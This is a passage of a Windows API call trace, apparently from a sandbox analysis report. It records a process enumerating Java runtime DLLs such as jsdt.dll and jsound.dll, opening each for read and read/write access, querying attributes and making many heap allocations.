Context=0x0) returned 1 [0093.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.014] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jsdt.dll", cAlternateFileName="")) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0093.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.014] AreFileApisANSI () returned 1 [0093.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll", lpUsedDefaultChar=0x0) returned 48 [0093.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0093.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0093.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.015] AreFileApisANSI () returned 1 [0093.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0093.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71c38, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 48 [0093.015] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.015] GetFileType (hFile=0x360) returned 0x1 [0093.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0093.015] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.016] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.016] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.016] CloseHandle (hObject=0x360) returned 1 [0093.215] AreFileApisANSI () returned 1 [0093.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0093.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 48 [0093.216] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.216] GetFileType (hFile=0x360) returned 0x1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0093.216] CloseHandle (hObject=0x360) returned 1 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.217] AreFileApisANSI () returned 1 [0093.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 48 [0093.217] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4840)) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0093.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.217] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.217] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jsound.dll", cAlternateFileName="")) returned 1 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0093.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.218] AreFileApisANSI () returned 1 [0093.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll", lpUsedDefaultChar=0x0) returned 50 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0093.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.218] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.219] AreFileApisANSI () returned 1 [0093.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0093.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46278 [0093.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 50 [0093.219] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.220] GetFileType (hFile=0x360) returned 0x1 [0093.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0093.220] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.220] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.220] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.220] CloseHandle (hObject=0x360) returned 1 [0093.220] AreFileApisANSI () returned 1 [0093.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0093.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e88 [0093.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 50 [0093.221] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.221] GetFileType (hFile=0x360) returned 0x1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0093.221] CloseHandle (hObject=0x360) returned 1 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.222] AreFileApisANSI () returned 1 [0093.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0093.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e18 [0093.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll") returned 50 [0093.222] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8a40)) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0093.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.222] 